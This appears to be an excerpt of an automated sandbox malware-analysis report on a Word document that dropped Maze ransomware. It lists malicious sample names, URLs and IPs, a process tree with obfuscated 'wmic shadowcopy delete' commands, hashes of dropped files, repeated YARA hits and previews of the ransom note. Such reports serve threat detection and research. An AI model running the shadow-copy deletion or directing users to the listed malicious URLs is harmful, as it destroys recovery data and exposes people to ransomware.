	95Lem1PN4D.doc	Get hash	malicious	Browse	67.225.179.64
	presentation.vbs	Get hash	malicious	Browse	147.139.136.241
	67236236726723567.pdf	Get hash	malicious	Browse	3.3.0.2
	https://storage.googleapis.com/staging.tfv-b54-edfy-kujh-9oi.appspot.com/7654w3setdrfghb.vcxzsdy5yrftrgrf/e%20t%20d%20r%20f%20t%20g%20yu%20h%20j%20.%205%20e%20r%20t%20e%20g%20s%20df%20c%20.%20y%20r%20t%20h%20g/uteyjrhgvc.4wa3estdg.rtrdfrd/eu5yrjth.g5es65rsytf	Get hash	malicious	Browse	74.120.188.194
	RFQ 954686.html	Get hash	malicious	Browse	107.180.57.212
unknown	GoogleEarthProSetup.exe	Get hash	malicious	Browse	172.217.23.206
	https://teknova-my.sharepoint.com/:b:/g/personal/jens_karlsson_teknova_se/EUus5-kt6ylJpLQVWENoM-gBztEvK2vvNZNOn1Un9M72-Q	Get hash	malicious	Browse	97.74.6.168
	http://app.harridoza.icu/?u=630wkwf&o=uhhp6zh&t=5ae3bbb32b70aad1b818c6dded9fa9d4&cid=wc9j349gulbl69jqhs41569c&trump=winbigger.club	Get hash	malicious	Browse	193.35.51.12
	Balance-Payment.html	Get hash	malicious	Browse	108.163.231.9
	k8tvLoVAAF.exe	Get hash	malicious	Browse	192.168.2.14
	OHY8adr7PL.exe	Get hash	malicious	Browse	192.168.2.14
	WXO7ibOBUf.exe	Get hash	malicious	Browse	192.168.2.12
	j7BzdiOJV9.exe	Get hash	malicious	Browse	192.168.2.14
	Ve7xJOvTJY.exe	Get hash	malicious	Browse	192.168.2.14
	Gq94UeOwn7.exe	Get hash	malicious	Browse	192.168.2.14
	pzEC0goeOS.exe	Get hash	malicious	Browse	192.168.2.14
	DOCUMENTO 06.doc	Get hash	malicious	Browse	104.18.56.96
	info_11_06.doc	Get hash	malicious	Browse	77.87.212.69
	8zwECUx69c.exe	Get hash	malicious	Browse	192.168.2.14
	2019_05_S1800735585_H0043475.xls	Get hash	malicious	Browse	47.254.236.15
	95Lem1PN4D.doc	Get hash	malicious	Browse	67.225.179.64
	presentation.vbs	Get hash	malicious	Browse	147.139.136.241
	67236236726723567.pdf	Get hash	malicious	Browse	3.3.0.2
	https://storage.googleapis.com/staging.tfv-b54-edfy-kujh-9oi.appspot.com/7654w3setdrfghb.vcxzsdy5yrftrgrf/e%20t%20d%20r%20f%20t%20g%20yu%20h%20j%20.%205%20e%20r%20t%20e%20g%20s%20df%20c%20.%20y%20r%20t%20h%20g/uteyjrhgvc.4wa3estdg.rtrdfrd/eu5yrjth.g5es65rsytf	Get hash	malicious	Browse	74.120.188.194
	RFQ 954686.html	Get hash	malicious	Browse	107.180.57.212
unknown	GoogleEarthProSetup.exe	Get hash	malicious	Browse	172.217.23.206
	https://teknova-my.sharepoint.com/:b:/g/personal/jens_karlsson_teknova_se/EUus5-kt6ylJpLQVWENoM-gBztEvK2vvNZNOn1Un9M72-Q	Get hash	malicious	Browse	97.74.6.168
	http://app.harridoza.icu/?u=630wkwf&o=uhhp6zh&t=5ae3bbb32b70aad1b818c6dded9fa9d4&cid=wc9j349gulbl69jqhs41569c&trump=winbigger.club	Get hash	malicious	Browse	193.35.51.12
	Balance-Payment.html	Get hash	malicious	Browse	108.163.231.9
	k8tvLoVAAF.exe	Get hash	malicious	Browse	192.168.2.14
	OHY8adr7PL.exe	Get hash	malicious	Browse	192.168.2.14
	WXO7ibOBUf.exe	Get hash	malicious	Browse	192.168.2.12
	j7BzdiOJV9.exe	Get hash	malicious	Browse	192.168.2.14
	Ve7xJOvTJY.exe	Get hash	malicious	Browse	192.168.2.14
	Gq94UeOwn7.exe	Get hash	malicious	Browse	192.168.2.14
	pzEC0goeOS.exe	Get hash	malicious	Browse	192.168.2.14
	DOCUMENTO 06.doc	Get hash	malicious	Browse	104.18.56.96
	info_11_06.doc	Get hash	malicious	Browse	77.87.212.69
	8zwECUx69c.exe	Get hash	malicious	Browse	192.168.2.14
	2019_05_S1800735585_H0043475.xls	Get hash	malicious	Browse	47.254.236.15
	95Lem1PN4D.doc	Get hash	malicious	Browse	67.225.179.64
	presentation.vbs	Get hash	malicious	Browse	147.139.136.241
	67236236726723567.pdf	Get hash	malicious	Browse	3.3.0.2
	https://storage.googleapis.com/staging.tfv-b54-edfy-kujh-9oi.appspot.com/7654w3setdrfghb.vcxzsdy5yrftrgrf/e%20t%20d%20r%20f%20t%20g%20yu%20h%20j%20.%205%20e%20r%20t%20e%20g%20s%20df%20c%20.%20y%20r%20t%20h%20g/uteyjrhgvc.4wa3estdg.rtrdfrd/eu5yrjth.g5es65rsytf	Get hash	malicious	Browse	74.120.188.194
	RFQ 954686.html	Get hash	malicious	Browse	107.180.57.212

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp	VERDI (002).doc	Get hash	malicious	Browse
C:\Windows\Temp\wupd12.14.tmp	VERDI (002).doc	Get hash	malicious	Browse

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

WINWORD.EXE (PID: 3180 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)

wupd12.14.tmp (PID: 3780 cmdline: C:\Windows\Temp\wupd12.14.tmp MD5: 0F841C6332C89EAA7CAC14C9D5B1D35B)

WMIC.exe (PID: 4068 cmdline: 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete MD5: A03CF3838775E0801A0894C8BACD2E56)

WMIC.exe (PID: 2780 cmdline: 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete MD5: A03CF3838775E0801A0894C8BACD2E56)

WINWORD.EXE (PID: 2928 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)

notepad.exe (PID: 1472 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt MD5: A4F6DF0E33E644E802C8798ED94D80EA)

cleanup

Created / dropped Files

C:\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	45940
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	B0449473C17C0307474EB2A83E174400
SHA1:	56B940FA785DDEF7EF090CF62FD3EDDDCEB951EE
SHA-256:	EBF5AD46BF58DFA085E085EEAC2AF1283CE774290994D864D047A5A061E38F5F
SHA-512:	BEB5F3F6C24019498FB869F7CEB4C6EB2F9620F6D5B2A134CB4BFAEDE89E9A9143707D66AD18A67ECE682C43A7D3A25674058AFC18B43B5EF8D44BA2174D6AFF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: C:\DECRYPT-FILES.txt, Author: Joe Security
Reputation:	low
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\ProgramData\data1.tmp Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	265
Entropy (8bit):	0.13557132264022248
Encrypted:	false
MD5:	76F8F28BD51EFA03AB992FDB050C8382
SHA1:	D32558CEEF23C7CAAA55B9C48D4A9CA00D1922DF
SHA-256:	5470F0644589685000154CB7D3F60280ACB16E39CA961CCE2C016078B303BC1B
SHA-512:	4CBC74EB814E376BB52A848A72CCA027BA817BF8FE10A37BA0D5E700EA441774C5C0FBD6A0D631C6DE643A55C7755F32EAD137F4195A13074715D03CF94E39F5
Malicious:	false
Reputation:	low
Preview:	.....................................................................................................................................................................................................................................................................f.af

C:\Recovery\30698442-3747-11e0-818c-d0aae148ac37\Winre.wim Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	144839049
Entropy (8bit):	7.999998804533926
Encrypted:	true
MD5:	12D481676DF2FD35FD5DBDB7AC701B1F
SHA1:	2A839A04341F1A511C298ACD7E4A79BE934AB61A
SHA-256:	163939C99B2DF5672837518939F3619A6ABAB58B30AF0E76ED46DD9D66044FC4
SHA-512:	18FD3F536BF5EF60A1319D7E8C2513F5B720A474BE9913C491AD646F326864169F7D774126707A02A08BEA7BC30BF860E6F0BDC562C6F3AE603343959B09049A
Malicious:	false
Reputation:	low
Preview:	#.).....o.Yn..p..L!Y..d...}Ww{....x...fB.Rb.e...B.{..[...G.........,Z......XHI..4.......B.....TJO.>....o.....-...D.k-..Ig/...9?D.o..^ClI.s.\|.F.$g.l.2Gg.."...........X....(..8PL.NA.8..3...'.N.-..0..{E..R..f...\..$.%,.03l...M.)...JVz...._v....A7..&...X.v....?6. ......t.O#.7....`.i....w.W8z...qF.W.=ZJ....*"0;J&v.~s-..O`...dV/..j.'...~.cL~.OUa..>..I..q.q..e...2...k[}...?....`.........4Za.......o..k.x.39T.Cl...:....<...3R.!..R.&....N...+..}).....?.Ii.EF_.S[=LJvVR)Iz[}C....9........[....66V.C@..y.Z/..AI..T.t.......K..._.....k<'......^k.f..mZ..%...w.9-...m..i...{...\|U.X..CI..Rp..)b.^z!.(/....."Rl=F]..... t...V..5...lN.9..\.=..g.f.1?1...Lk....).-Szz.F....v...4....S...xa.X..o..B../B?.\|.;q2G..L.\|..x/.cT0...6...H.n.ow..".]...............9.....?.a..up..4..T..24N...S...{.v...&...(.3%.X.....:z...,.H.Y:8.. 61,.2...y_......3#.....E...5.."...`.c.6e.O..L.Pq..DC.#..h8.u...P.o...<..g...m}......#...Q....G.{.f..5...%..1...h..T+.Vt...}.{b.m.. .._...2..4.DE

C:\Recovery\30698442-3747-11e0-818c-d0aae148ac37\boot.sdi Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.197469971483673
Encrypted:	false
MD5:	4286631E7D1D77F82E50BDB1A41C09F4
SHA1:	62FC0C82B648D20D85E673BA9C7CE94F400C7CE8
SHA-256:	E8C0046AE8026A5183793411B7CE8D59A983CC5E813E548A2C0B94F9EAA08928
SHA-512:	2D21334BF622FCDC72C9B0DC345A2492F8E91A20ADD521A07672ED8191D282D7BB04C9E056248408F20CBD9624CACFACD6B1E630512DE53DA228C8B1AB692265
Malicious:	false
Reputation:	low
Preview:	t:E..^..A..cgH..<7....".$.uc.~H.cR..'.d.u7%..%..ts0.&D-C.T$\.....z6... .:."w...}v{.rM<]*.j.....Cy.O..<....9...@d.~.[!~......(......%.3p.....q."..gr(.].k...t....z&6..G..VGj.....E....y.z$...ehs.HX...Sk4.#..BF.c-.x8!.t.v...!.....j#7XDWi...`..w.R.]5...m~>....f.af

C:\Users\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	64316
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	F34B7EDF1CCE9814DB579A1309515E57
SHA1:	0416006332156890BBCF834E204F78605B476531
SHA-256:	CA92983C40594E46CA05D995B3EE843400A982A565F51057DD8FA38A819A65D7
SHA-512:	A8C35249056B7961BCE06E6BD16510C6D6230D74A7D98FF288E22996B8A067416C56A9D6A31529D94E56766A84F609AB0845CDCB400679A66B4BA8989C24FD79
Malicious:	false
Reputation:	low
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	792
Entropy (8bit):	7.670883430759517
Encrypted:	false
MD5:	2D2B5150ABB44474F34F24B913E4B774
SHA1:	5295D001F155CF82E382D20D467EFE18CA26ED44
SHA-256:	182B0D9F88C61DF4EE446415B3936344101F9411F68FAAF10D0D0FC760733363
SHA-512:	17950B6842F6E32364B1105577D438091D0D44FE0295D1EBEA5340F3D79994FD0125494B66068482F6815C8A252678EBC642BEEC7C08F3259C0F03153FCC4105
Malicious:	false
Reputation:	low
Preview:	..x21.!1."......h.......]...#.....Zi.....?.(s.X..<.[=A....6.WQ..-.z.W.?N..h..~.O..Cl..x;rj..9.....ye.h.)4....v.......S...\..B..]>.Zi#G,. v.'#G.I#VH.Y.OqU.....t.Pg.!....C.h.h..m.,.......W.w....(F...\...Lj.Q%y;.......zr.I.p.'..fZ....S....*......:....f.afo...Vn.jo....`...&...i.=..V,.9q......E....w...z..#...M>c...J......+....Z._.Js..L@Z.P._..i1..\...UO{.....G.....O.....(.F...._.`.....%.I.....R...R.. ....z9%>.p..>..i'...}.6.6DC..Z...P........:.\...=FT...L;..r..6EjY....a....R..@...:.9QV.T..4..nO.e....f.af......6.m.....+.p......G....y..\|....-L..0@.........fD6...K).f..r.....b.6...v.h,@......u(.H9CE.f...3.....0.%`..8.M..pT.V{..{..rV...gw...F....;o....a9..)...x......#.@.;.Z.....Ns..<...O.O.0...B].....'.../...b..6%.@..r....V.8...6...A.\|....Tr^Pu.....f.af

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	137820
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	DD3FA099587E5B81690D676683A3CC6C
SHA1:	28FAEB3F9233E1EC569DCD1A0A59082878B5C04F
SHA-256:	CF74EB8512114051C50412E5A184C3E1956266D31B7D2B2569014D5EE81DBBAB
SHA-512:	FB92ABCF71EED33214A6FE278FE36EA4FDE9F36E34933C3128D6CED1B2D28C6DA3456C1121142C2FCDF6021384C04A96319DAD8DA6E60AE8D255806DB0079BA6
Malicious:	false
Reputation:	low
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\Default\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	119444
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	F40CE5EB8F7C95CBF44F920ECE2BA414
SHA1:	DA65906136D661199A69BE8BCF26CDDE24B49559
SHA-256:	21F3992AA51A05FED7DB4D6CEBD185C6D1E02414B2E1BD89A15ED0061C3C1717
SHA-512:	ABEB3D08BE3EE987D5DBF38520E47B9CBAE100B96B4648F2E503DEEE63230DC9CE2E5BC86FC8F8CF107E580CEF339E8A731D597CF954D94753E4A6D3683715F6
Malicious:	false
Reputation:	low
